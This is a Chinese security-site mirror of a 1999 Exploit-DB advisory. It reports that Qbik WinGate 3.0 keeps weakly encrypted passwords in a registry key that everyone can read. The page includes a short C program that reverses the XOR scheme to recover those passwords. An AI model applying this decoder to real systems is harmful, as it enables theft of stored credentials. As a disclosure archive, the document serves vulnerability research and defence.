Qbik WinGate 3.0 – Registry

Qbik WinGate 3.0 – Registry

漏洞ID 1053384 漏洞类型
发布时间 1999-02-22 更新时间 1999-02-22
图片[1]-Qbik WinGate 3.0 – Registry-安全小百科CVE编号 N/A
图片[2]-Qbik WinGate 3.0 – Registry-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/19412
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/511/info

WinGate stores encrypted passwords in the registry, in a subkey where Everyone has Read access by default. The encryption scheme is weak, and therefore anyone can get and decrypt them.

#include "stdafx.h"
#include <stdio.h>
#include <string.h>

main(int argc, char *argv[]) {
char i;

for(i = 0; i < strlen(argv[1]); i++)
putchar(argv[1][i]^(char)((i + 1) << 1));
return 0;

}

相关推荐: WS_FTP Server Denial of Service Vulnerability

WS_FTP Server Denial of Service Vulnerability 漏洞ID 1104794 漏洞类型 Boundary Condition Error 发布时间 1999-02-04 更新时间 1999-02-04 CVE编号 N/A…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享